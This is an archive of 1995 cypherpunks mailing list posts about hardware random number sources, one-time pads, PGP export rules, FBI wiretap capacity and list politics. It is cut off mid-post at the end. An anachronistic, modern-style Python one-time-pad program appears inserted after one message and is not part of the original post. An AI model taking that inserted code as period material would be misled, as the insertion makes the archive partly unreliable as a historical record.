Date: Sun, 5 Nov 1995 02:07:32 +0800
Subject: [NOISE] Re: 800_ape
In-Reply-To: <199511041323.IAA16916@pipe1.nyc.pipeline.com>
Message-ID: <Pine.ULT.3.91.951104095757.6549A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 4 Nov 1995, John Young wrote:

>    11-5-95. NYPaper Sunday Magazine:
> 
>    "Making Microsoft Safe For Capitalism. How do you restrain
>    an 800-pound gorilla?" Cover story. By James Gleick.
> 
>       'Anything not a direct lie or clearly illegal is O.K. to
>       do if it advances Microsoft's tribal cause,' Mitchell
>       Kapor says. 'This licenses the worst sort of
>       manipulations, lies, tortured self-justification and so
>       on.'

Mitch is incorrect. Microsoft considers direct lies to be OK. Witness the 
handling of the SMB security bugs.

I'm putting together a "Windows 95 Frequently Unanswered Questions File."

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 5 Nov 1995 01:41:51 +0800
To: cypherpunks@toad.com
Subject: Re: Sources of randomness
Message-ID: <acc0dca515021004eb09@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:04 AM 11/4/95, Peter Monta wrote:

>Perhaps there ought to be a couple of standard random-bit-source
>implementations, say at the CMOS-standard-cell and board-subsystem
>levels, that are widely vetted and trusted (and used!).  But it's
>mostly a solved problem, seems to me.

This is something John Gilmore called for when he wrote:

At 9:50 PM 9/20/95, John Gilmore wrote:
>Software-generated random numbers are likely to be of poor quality.
>There just isn't that much true randomness visible to computers.
>Several ways to build good hardware random number generators are
>known.  But before hardware random number generators can be
>incorporated into common desktop computers, someone will have to put
>them into a small fraction of a chip.
>
>Currently, random number generators are chips or larger circuits.
>Nobody will pay to put these on a motherboard.  But if a random number
>generating circuit occupied 1/1000th of a CPU chip or "multi-function
>I/O" chip, cost would not be a reason to leave it out.
>
>You probably can't build a hardware random number generator out of
>existing "gate array" gates or "standard cell" cells, because all the
>existing gates and cells are designed to behave completely
>predictably!  It will take designing a new circuit structure.
>
>Do we know any solid state physics / circuit design experts who think
>this might be a fun thing to do?  I bet you could get a paper out of
>it.  And probably improve the world a few years later, when companies
>used your paper to close another hole in their computer security.
>
>        John

There were several other posts in this thread, so interested folks might
want to check the archives for this time period.

Continuing on with Peter Monta's post:

>A radioactive source might be okay at the board level (though probably
>costlier than its electronic counterpart), but it'd be a pain to
>integrate, and it might disturb the rest of the chip.  (I'd like to
>have a get_random_bit instruction as part of a microprocessor, for
>example.)  Also if you want a high rate of random bits, you need many
>decay events, whereas for electronic sources the corresponding
>bandwidth is free---Johnson and shot noise are flat to 1 THz or so.

I agree, for several reasons. First, I agree that electronic noise sources
are easy to build, easy to get licenses for use (basically, no licenses,
unless the ITAR boys decide random number generators are munitions--maybe
the "This t-shirt is a munition" could have "export-controlled dice"?).

Second, the ease of integration as a standard library module.

However, getting the chip companies to do this will not be easy. They
generally don't see the need (hey, even _we_ don't, given the diverse
opinions on what is needed).

This is why many of us favor an external dongle that plugs in somewhere.
Then it could be sold cheaply and not have to get "buy-ins" from industry
and committees.

One idea is something that superficially looks like a modem, as everyone
has modem software and ports (though I suppose many people use internal
modems and so can't easily access it.) One would attach the "RNG-modem," a
little dongle, and grab noise into a buffer for processing (hashing,
filtering, etc.), or as ASCII garbage.

(Before anyone jokingly asks about "1-800-RANDOMS," I've thought of it. Not
practical, for obvious reasons.)

A purer approach would be just a noise source dumped into dev/random, or
whatever one wishes to call it.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sat, 4 Nov 1995 23:59:14 +0800
To: Alan.Pugh@internetMCI.COM (amp)
Subject: Re: using pgp to make an otp
In-Reply-To: <01HX8P5B3MCI91XT4Q@MAIL-CLUSTER.PCY.MCI.NET>
Message-ID: <199511041555.KAA02171@homeport.org>
MIME-Version: 1.0
Content-Type: text



| i may have posted this at some time in the past, as i have asked it
| elsewhere and gotten different responses. i'm interested in what the
| folx here think about it though, so here it is...

I think you should read Marcus Ranum's OTP faq, on www.iwi.com:/pubs/

| i want a source of data for use as a otp. i don't want to have to
| hook up any external devices to my pc to do it. (although some of the
| methods mentioned in the past few days are quite interesting.)

Can't be done.  If you use a cipher to generate the pad, you have less
than full, honest to nature entropy, and you might as well use PGP.
Badly generated, or reused OTPs are very poor ciphers.

| i'd like to know if there was a reason not to use the output of pgp
| to do it. i've been playing with the following method. i take a file

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 5 Nov 1995 03:46:48 +0800
To: cypherpunks@toad.com
Subject: Cypherpunks Santa Cruz Meeting/Party, 95-11-11
Message-ID: <acc0ff391c0210040aca@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I have sent out a detailed announcement of a "Cypherpunks Santa Cruz"
meeting/party at my house in Corralitos, California, on Saturday, 11
November.

This was sent to the mailing list of interested folks I maintain. If you
are on this list, you already got the detailed message. If you are
interested in getting on the list, drop me a line. I can also send the
detailed announcement to anyone who is interested.

As background, the Cypherpunks Santa Cruz is for folks in the Santa Cruz,
Monterey, Carmel, Boulder Creek, Watsonville, Salinas, Big Sur, etc. area,
or for anyone else on the Central Coast. Or anyone else, for that matter.
At the last (and first) party we had Greg Broiles down from Eugene, Oregon,
and Jeff Simmons up from San Luis Obispo, plus a bunch of folks from "over
the hill" in the Silicon Valley/Bay Area. All told, 25 people.

I'm not sure if there is a Bay Area meeting that day. If so, attend one or
the other, or both, as my party starts late afternoon (of course, it may be
a long drive, depending on where the Bay Aryans are meeting).

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Sun, 5 Nov 1995 04:06:10 +0800
To: cypherpunks@toad.com
Subject: Crypto++, Cpunk Icons, list noise
Message-ID: <199511041954.MAA00210@wero.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Wei Dai <weidai@eskimo.com> writes:

>I am still talking to RSADSI's lawyers, but it's taking a lot longer 

And the efforts are appreciated. Of course, your original efforts can
still be appreciated at utopia.hacktic.nl. 

I don't know about everyone else, but that TCP encryption sounded
interesting. Any plans to discuss it on the list? 

- -----

An anonymous complainer writes:

>Well, Perry, my opinion is that there is far too much noise on this list 
>as it is.  I have already seen my words drowned out by bellyaching over 
>next to nothing.

POT-KETTLE-BLACK.

Also, since nothing you've written (in your commentary, as opposed to
anonymous announcements or releases that most people use anonymity for
here) indicates that you're using anonymity for any particular reason,
please stop so people can killfile you. Or send it from a nym at
alpha.c2.org. I mean, the NSA has your real name anyway, what's the
point... 

- ---------

Jay Campbell <edge@got.net> writes:

>>masquerade as Injuns in the 1800's and waylay Pony Express riders in order 
>>                            ^^^^^^
>>I think you'll find the NSA was not in existence in the 1800's.

>I'm disappointed at the sheer number of similar pieces of email I received
>on this. You'da thought the Capn Crunch reference was silly enough that
>people would give me a funny look and trash the original message.

Hmm, I guess most of them at least had the sense to not send it to the
list. The list still sees FAR too many personal queries and rebuttals. TO
THE GUILTY: take your bonehead replies to email please.

Jay: I had a similar experience when I mentioned elsewhere that all the
primes under 1000 digits were really invented by the NSA over 20 years
ago. I recommended wearing garlic around the neck for protection... 

Everyone: This 1% wiretap thing is getting old. Hint hint hint

- ----

Lastly, regarding cpunk icons, the only ones I was able to find were at
the BAP site. I've been drawing a few of my own, one of them is done. It's
a yellow diamond that says Cypherpunk on Board. And it has the anarchy-A-
inside-a-C symbol. It's interlaced and transparent, so it doesn't look too
bad. You're all welcome to steal it at http://students.cs.byu.edu/~don.
Also working on a PGP icon. BAP has an envelope with PGP being the seal. I
was thinking maybe a deadbolt ("PGP") with the inscription "Mommy said to
lock the doors at night" or some kind of safety lock-your-doors or
lock-your-data reference. 

For the time being I'm working on a simple PGP/ZLDF icon, it will be
on my page Real Soon Now[tm]. If you like my icons please tell me.

Don

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMJvC7sLa+QKZS485AQFrIgL/VuRfkh7i+K3W3bLyep26riXdZgIVC557
RRcHf9VcacXOGyVvT03JESqNxV/XRcW2k8WDQ+fwhMDEHbHjkzWT5fUxXm6knRGc
K0drBF8WlW0ZobEaiU7SgEnVjus5kFj4
=iAr6
-----END PGP SIGNATURE-----
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://students.cs.byu.edu/~don   or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Junk mail to root@127.0.0.1
* This user insured by the Smith, Wesson, & Zimmermann insurance company *




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Sun, 5 Nov 1995 06:10:51 +0800
To: James Black <black@eng.usf.edu>
Subject: Re: using PGP only for digital signatures
In-Reply-To: <Pine.SUN.3.91.951104155911.2413A-100000@fourier>
Message-ID: <199511042157.NAA09158@ihtfp.org>
MIME-Version: 1.0
Content-Type: text/plain


Well, MIT does make PGP available to any and all students and staff!
The opinion I've heard is that if the US gov't doesn't want an
international student at MIT to use the code, they should keep that
student from coming to the US.  By allowing the student into the US,
the gov't is implicitly giving them the right to use PGP within the
US.

It is still illegal for them to export it, however any foreign
national can walk up to any computer store and buy anything they wish,
and take it on the plane with them.  Therefore, in an institution of
higher learning, the same standards should be allowed.  If the
government does not want your student to have access to possibly
"dangerous" information, then they should not be allowed into the
country at all.

Therefore, I say just make PGP available to your students.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jek@ininx.com (John E. Kreznar)
Date: Sun, 5 Nov 1995 06:19:26 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto & Taxes [WAS Re: Cybersecurity]
In-Reply-To: <9511031621.AA11770@zorch.w3.org>
Message-ID: <m0tBqd0-000147C@ininx.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hallam writes
   Stewart writes
   >Froomkin writes
   >>Hold on.  This is more "factoid" than "fact": recall that income
   >>is PAID by people as well as EARNED by people.  Most payers have
   >>easily detectible physical presence and assets that can easily be
   >>attached by regulators.  It will be a cold day before, e.g., my
   >>employer agrees not to report my earnings.  And the same is true
   >>for most employers in most industries.

   >Unfortunately, this is true, at least for people whose employers
   >are subject to income tax somewhere.  Taxing businesses doesn't
   >make sense economically - you could collect almost as much money
   >with far less disruption to the underlying economy by taxing it as
   >wages for workers and

   Why unfortunately? I happen to consider that our modern social
   economy is a high point of civilisation.

Far from civilized, taxation is a residue of our savage past, and its
resurgence in this century is a backwards movement.

Relations among civilized people are by mutual consent, or not at all.
Taxation (and government generally) is an attempt by one segment of
the population (the political segment) to impose a relation upon the
rest of us to which we do not consent.

   It is certainly a tremendous achievement.  We can educate the
   entire population, provide them with health care, prevent famine
   and provide protection against crime and aggression by other
   states. All in all rather a good deal.

   While one might wish to personally avoid paying taxes there are no
   benefits if everyone avoids paying taxes. There are significant
   areas of the economy which can only be funded through social
   mandates, roads for example.

My interest in cypherpunks is for its potential to enable a personal
cryptographic defense against the arrogant aggressiveness of these
arbitrary and intrusive politically motivated ``social mandates''.

What is your interest in cypherpunks?  To know your intended victims,
perhaps?

   Few people realise that when they use their credit card in a
   supermarket they are supplying a direct mail marketing company with
   a profile of their spending patterns. They are also providing a
   statement of where they are, and indirectly their income, residence
   etc.

So, don't use a credit card!

   What is needed is stringent data protection laws which enforce the
   confidentiality of personal information. Note that both the SEPP
   and STT payments systems conceal the credit card number from the
   merchant.  Cryptographic locks on individual parts of the picture
   are insufficient however. What is needed is laws which make the
   financing of the underlying architecture uneconomic.

Ah yes.  More ``social mandates''

[I don't have time to read or write cypherpunks these days, but the
idea that there's something civilized about taxation leapt out at me
and demanded a response.]

   John E. Kreznar  | 44D955A1F452DF66 | Taxes are caused by people
    jek@ininx.com   | A1575DEF434DC152 |  wanting government benefits.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.i
Comment: ...because I decline on principle to affirm any nationality.

iQCVAgUBMJvhbQor0ZwpiwZpAQEARgP/bOpwC16JYTxaAA5ExHOEWQl/V6FYTHmo
46MrGVhSh6WLW6yIwMi2I4mhqISjzV6BtFf+/qu6JOOq7JejqdXKZX4SMcAAWuXh
I+p3WSm5QwfLj9rfiKdnCfpO1NNsxx/HBeCIaXEY0tGVbWVp38vf+Kwugoe6a62C
3ylLFqNzgF4=
=NAy5
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 6 Nov 1995 17:04:34 +0800
To: cypherpunks@toad.com
Subject: on topic!!
Message-ID: <199511042217.OAA16960@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



PM and TCM frequently debate about what is relevant on this list.

I have sometimes commented on this.

in fact PM's conservative stance to relevance, and TCM's more liberal
one, and the tension between the two goes back to list origins.

this is a highly inflammable topic, and I am surely going to get my
eyebrows toasted for saying *anything*, however I would like to say 
a few things:

if there were two key elements here, these conversations would probably
largely go away (instead of continually reappear)

- an unambiguous charter
- an active moderator

unfortunately I suspect that a moderator does exist but he "prefers
to remain anonymous" ("pseudonymous"?). imho that is precisely 
how *not* to succeed as a moderator.

PM and TCM are indeed filling a genuine vacuum. when the moderator is AWOL, 
pseudomoderators fight each other.

(oops, the whole idea of a moderator is just not anarchic enough. well, then
I suggest everyone just enjoy these repeated, endless displays of public
bile and hostility as the basic modus operandi of people who embrace the
glory of anarchy. anarchy in action!! but it is more fun to deny them
as total delusions and effects entirely attributable to one's enemies..)

--

also, another frequent split on this list is of politics vs. coding.
frankly I think just having two lists, one dedicated to "cypherpunk
politics", the other dedicated to "cypherpunk technicality", would
solve most problems.

and finally again I suggest as I have in the past that no one other
than the moderator really has any authority to say what is or is not 
relevant. and if you see someone say what is, take it with a grain
of salt, or ignore it if you like.

a major problem is people defending themselves when they are attacked
by someone who says "that's not relevant!!". the problem is the perception
of the loss of face. otherwise, what's the point? this is an 
interesting psychological effect that I have observed even when people use 
pseudonyms. it seems it is deeply ingrained into human behavior. this
list is in fact imho a hotbed of psychological displays. the machismo
factor is pretty thick and deep at times too.

to all this I suggest one consider the idea that "criticism by a bonehead is 
as flattering as praise from a genius".

(hee, hee)

for those who absolutely cannot refrain from trying to yell at other
people about relevant postings (judging by the mail, a rather significant
percentage) I suggest you quote the *charter* whenever you do so, to
demonstrate whatever authority it is you think you have.

--

anyone who needs moderator lessons should take them from S.Sandfort,
an ex teacher who runs cypherpunk meetings involving a lot of childhood
psychologies as effectively as humanly possible, IMHO.

--

p.s. it appears to me the entrance requirements for cypherpunk membership
are to have a 150 IQ and a 75 *EQ*. and that all the arguing and hostility
comes from the more uninhibited pathological cases of these people.

--

one could in fact have great fun impersonating someone with a 
grotesquely low EQ on this list and create a tremendous reaction
among all the people with equally low EQs, responding to the bait
with the same intelligence a fish attacks a wiggling worm.

it would be "evolution in action", imho.

(hee, hee.)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 5 Nov 1995 03:54:30 +0800
To: Peter Monta <pmonta@qualcomm.com>
Subject: Re: Sources of randomness
In-Reply-To: <199511040804.AAA03552@mage.qualcomm.com>
Message-ID: <199511041945.OAA06613@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Peter Monta writes:
> But how wrong is wrong?  Unless the design is catastrophically bad,
> a zener source is going to give you zener noise plus some slight
> admixture of interference.  Say the designer is extremely careless
> and there's deterministic interference 20 dB down.  I don't see
> how even that matters cryptographically---the resulting loss in
> entropy will be millibits per sample.

[lots elided]

As a smart EE, it's very easy for you to personally understand the
design of a device you have personally constructed well enough that
you can trust it. On the other hand, consider a black box Johnson
noise based device that you are handed. You check the random numbers
coming out; they seem roughly right. You know, of course, that the box
could simply be a very clever Blum-Blum-Shub based PRNG with the seed
being stored at the enemy's secret lab, and you wouldn't have any
solid handle on how to determine that without taking the device apart.

On the other hand, I can take a radiation detector and test it damn
easily with easy to acquire calibrated sources.

> A radioactive source might be okay at the board level (though probably
> costlier than its electronic counterpart), but it'd be a pain to
> integrate, and it might disturb the rest of the chip.

Certainly you can't put such a device into a portable phone -- a Zener
diode beats a geiger counter in such cases. On the other hand, a
portable phone has to deal with a threat model in which there are very
simple ways -- like plain eavesdropping -- to hear the
conversation. If, though, you have a large electronic bank's central
key management machine in mind, the extra trouble of using an external
radiation detector would probably be worthwhile, assuming you had
plugged other holes, given the ease with which the system may be
tested and the amount of cash at stake.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 5 Nov 1995 07:39:29 +0800
To: Derek Atkins <warlord@MIT.EDU>
Subject: Re: using PGP only for digital signatures
In-Reply-To: <199511042157.NAA09158@ihtfp.org>
Message-ID: <Pine.SOL.3.91.951104151622.6970B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 4 Nov 1995, Derek Atkins wrote:

> student from coming to the US.  By allowing the student into the US,
> the gov't is implicitly giving them the right to use PGP within the
> US.

This is kind of a risky policy to take. The general feeling I get is that 
allowing non green-card holders access to strong cryptography is sort of 
decriminalised, in that the police aren't likely to break down your door 
and have your AFS server accidentally fall down stairs. However, it is 
still against the law, and could be used against the university in other 
unrelated circumstances.

It seems that licences allowing foreign nationals access to cryptographic 
software within the US are pretty easy to get, and especially for 
something like PGP on a central machine. 

Simon // My name is Spero, Simon Spero - licence to encrypt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 5 Nov 1995 07:47:02 +0800
To: Michael Kohne <mhkohne@discordia.org>
Subject: Re: consumer products that make nice sources
In-Reply-To: <v02120d00acc195427273@[205.164.159.32]>
Message-ID: <Pine.SOL.3.91.951104153533.6970C-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 4 Nov 1995, Michael Kohne wrote:
> 
> Although, I don't think it has the same sort of humor value as the pillow.
> (What's that hooked to your computer Mike? It's a pillow Bob. Don't ask.)
> 

I've always wanted to make a RNG by sticking a Brownian motion detector 
into a really hot cup of tea...

Simon // Share and Enjoy(tm)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 5 Nov 1995 07:12:08 +0800
To: cypherpunks@toad.com
Subject: Re: FBI seeks huge wiretapping system
Message-ID: <199511042303.PAA29063@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


> What is very odd however is the FBI request for $500 million.
> [to tap phones]

What is odd about that? -- when I visited Cuba a couple of years 
ago it looked to me as if a major chunk of the GNP went into
watching people.  (I hear the situation has improved since then,
perhaps thanks to their continuing bankruptcy.)


At 12:09 PM 11/2/95 -0500, hallam@w3.org wrote:
> When the NSA are being asked to comment on an export license they
> are being asked "is this thing dangerous", not "should it be exported".
> But when the response comes back to commerce "it's dangerous" you can 
> hardly expect the person on the other end to put their neck out on the
> line and risk allowing [...]

This of course is the basic evil of government regulation:  Bricks are
dangerous.  Two by fours are dangerous.  Water is dangerous.  Playgrounds
are dangerous.  Everything is dangerous, because everything could be used 
to cause harm, deliberately or accidentally.

Therefore every action needs to be supervised, controlled, and directed
by your wise and benevolent government, and any attempt to avoid the
benevolent observation of the all seeing eye shows that you must be a 
child pornographer-terrorist-drug-trafficker-money-launderer.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 5 Nov 1995 07:12:09 +0800
To: Rich Graves <nbrodbeck@hollandhart.com>
Subject: Re: Telephone switch capacity -Reply
Message-ID: <199511042303.PAA29072@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:43 PM 11/3/95 -0800, Rich Graves wrote:
> Of course the FBI doesn't have the staff to listen to all these lines, and
> they need an individual court order to authorize each individual
> interception, so this numbers game is a bit of a joke. 


This is false:

The FBI is legally authorized to intercept phone lines by court
order "or other lawful authority".

From the money it would seem that "other lawful authority" intercepts
vastly exceed court ordered intercepts.

You will recall the vast outcry in the liberal lapdog press when this
vast new power was given to them -- You don't recall it?!  Neither do I.

This is one of the many vast extensions of government power that we
see come down at a steadily increasing rate, to the accompaniment
of total silence from a compliant and submissive mass media.

> There is no controversy about the number of wiretaps that have been
> authorized, except as manufactured by the Spotlight folks and other
> conspiracy loons. 

If the only taps are court ordered wiretaps, it would seem we
are paying about half a million to a million dollars per wire
tap, which is a shade expensive even for government work.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 5 Nov 1995 08:07:19 +0800
To: cypherpunks@toad.com
Subject: Re: Telephone switch capacity
Message-ID: <199511042351.PAA07347@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>	Please be aware that the current capacity of the
>telephone system in the United States (and for that matter,
>most of the developed world) is only capable of supporting
>between 15 and 20 percent simultaneous telephone
>conversations.  If the FBI wishes to set up a system that is
>capable of monitoring 1% of the total number of lines, that
>equates to an ability to tap 5%, not 1% of all calls in progress.

The FBI now says they only want to tap 1% of simultaneous capacity,
not 1% of total number of lines.  On the other hand, the actual utilization
of the telephone network is also much lower than the number of lines -
back when I was a voice-telephony geek, our estimates for busy-hour
phone utilization were about 1/12 for residential and 1/6 for business
(3 and 6 hundred call-seconds per hour); that was before widespread
use of fax machines, modems, or LANs, so business utilization has
probably increased.  Equipped trunk capacity was typically enough to
have a maximum of 1% blocking during busy hour, which means a certain
amount of margin over average calls in progress, and switch capacity 
depends radically on technology - some kinds of switches are non-blocking,
while others have various capacity limits.

"One Bell System - It Works!"
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 5 Nov 1995 08:07:14 +0800
To: amp <Alan.Pugh@internetMCI.COM>
Subject: Re: using pgp to make an otp
Message-ID: <199511042351.PAA07430@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:58 AM 11/5/95 -0500, amp <Alan.Pugh@internetMCI.COM> wrote:
>i want a source of data for use as a otp. 
....
>i'd like to know if there was a reason not to use the output of pgp

Either PGP is a strong enough cryptosystem that you don't need
to use a one-time-pad, or it's not, in which case you need better
randomness than PGP will give you (I doubt it), or you have special
applications for which PGP is impractical (like decrypting small amounts
of data on a very wimpy machine in an environment that you can easily
distribute OTP keys (for using ONCE ONLY)).  Or you're just doing it for fun.

A OTP can give you provably secure cryptography, given that the pad
is only used once, and has real randomness behind it.  If it's only
pseudo-random numbers (e.g. generated from some algorithm), then
it's as crackable as the source of random numbers, and therefore no
longer provably secure.  And of course, if you use it more than once,
or your pad distribution isn't secure, you lose.

>i still need a program to make use of the otp i've produced, 

Two alternatives - spend 5 minutes writing it in a language you know well,
or pick a language you don't know very well and use it as an excuse
to learn the language.  It's slightly more complex than "hello, world",
since you need to input data from two files and use XOR.  

>what are the holes in this?  why would it be unadvisable to do it?
The big problem with OTPs (other than getting people to use the pads
ONLY ONCE, since they're otherwise hosed) is shipping them around;
the traditional method is guys with briefcases handcuffed to their arms....

>otoh, would it be a good basis for a otp?
Large quantities of good random numbers are hard to find.  Small quantities
can come from dice or throwing darts at the stock market pages;
the zener diode or radioactivity methods people have been discussing
will produce larger quantities if you've got the equipment.
If you've got one of those new radio-tuner boards for your PC, tuning it
to an unused station might be quite decent, and we've just been discussing
whether video is any good.

With many of these sources, it's probably worth grinding the numbers through
some sort of compression or encryption algorithm just to smudge over any
periodicity or other structure to it.
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
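
The two-file XOR program mentioned in the message above, as an added example that is not part of the original post. The `PadFile` class, its `.used` sidecar file and all function names are assumptions of this sketch. It enforces the "ONCE ONLY" rule by recording how much of the pad has been consumed, and `reuse_leak` shows what a reused slice gives away.

```python
import os
import tempfile


class PadExhausted(Exception):
    """The message needs more unused pad bytes than the pad file has left."""


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR two equal-length byte strings (the whole 'cipher' of an OTP)."""
    if len(data) != len(key):
        raise ValueError("pad slice must be exactly as long as the data")
    return bytes(d ^ k for d, k in zip(data, key))


class PadFile:
    """A pad kept in a file, plus a sidecar file counting consumed bytes.

    The "<pad>.used" sidecar name and format are assumptions of this example.
    """

    def __init__(self, path: str):
        self.path = path
        self.state_path = path + ".used"

    def used(self) -> int:
        try:
            with open(self.state_path) as f:
                return int(f.read().strip())
        except FileNotFoundError:
            return 0

    def take(self, n: int):
        """Return (offset, n never-before-issued pad bytes)."""
        offset = self.used()
        with open(self.path, "rb") as f:
            f.seek(offset)
            chunk = f.read(n)
        if len(chunk) < n:
            raise PadExhausted(f"need {n} bytes, only {len(chunk)} unused")
        # Commit the new offset before handing out the bytes: a crash can then
        # waste pad material but never cause the same bytes to be issued twice.
        with open(self.state_path, "w") as f:
            f.write(str(offset + n))
        return offset, chunk

    def read_at(self, offset: int, n: int) -> bytes:
        """Receiver side: fetch the slice the sender says it used."""
        with open(self.path, "rb") as f:
            f.seek(offset)
            chunk = f.read(n)
        if len(chunk) < n:
            raise PadExhausted("ciphertext refers to bytes past the end of the pad")
        return chunk


def encrypt(pad: PadFile, plaintext: bytes):
    """Return (offset, ciphertext); the offset travels with the ciphertext."""
    offset, key = pad.take(len(plaintext))
    return offset, xor_bytes(plaintext, key)


def decrypt(pad: PadFile, offset: int, ciphertext: bytes) -> bytes:
    return xor_bytes(ciphertext, pad.read_at(offset, len(ciphertext)))


def reuse_leak(p1: bytes, p2: bytes, key: bytes) -> bytes:
    """What an eavesdropper holds when one pad slice covers two messages:
    c1 XOR c2 equals p1 XOR p2, with the pad cancelled out entirely."""
    c1, c2 = xor_bytes(p1, key), xor_bytes(p2, key)
    return xor_bytes(c1, c2)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "pad.bin")
        # Constructed sample pad. os.urandom is a stand-in here: a real pad
        # needs a physical noise source, as the thread discusses.
        with open(path, "wb") as f:
            f.write(os.urandom(64))
        pad = PadFile(path)
        off, ct = encrypt(pad, b"meet at noon")
        print(off, ct.hex(), decrypt(pad, off, ct))
```

Both parties need identical copies of the pad file; only the sender's copy needs the consumption counter.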





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 5 Nov 1995 08:08:29 +0800
To: cypherpunks@toad.com
Subject: Re: Video as a source of randomness
Message-ID: <199511042352.PAA07530@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>>How useful would it be to use a video stream as a source of random input
>>to something like /dev/random?  I'm thinking along the lines of a
>>Connectix QuickCam (sp?) or the cool videocam that comes with the Indy.
>>It seems to me that the picture received by a camera sitting atop a
>>monitor would be quite unpredictable. (relatively) High bandwidth, too.

Depends on what the camera's looking at - the first frame you grab may have
a lot of entropy, but if there's nothing much going on in the room, 
one frame's going to look a lot like the next.  Of course, pointing the camera
at your keyboard and taking a video of you typing in lots of random
numbers will probably produce better randomness than just timing the keys
while you do so...  But do move it away before typing in your passphrase...
Pointing the camera at a snowy TV or out the window or at a cat playing
with catnip can generate much more randomness if you need it.

Somebody was saying that of course not many computers will have video capture
devices on them, but it was probably one of those parochial PC or Unix geeks
who forget that Mac users get all the cool video/audio gear long before
the rest of us :-)
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 5 Nov 1995 08:08:41 +0800
To: cypherpunks@toad.com
Subject: /dev/random - using up entropy?
Message-ID: <199511042352.PAA07554@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


The discussions of what to do when /dev/random has handed out all of its
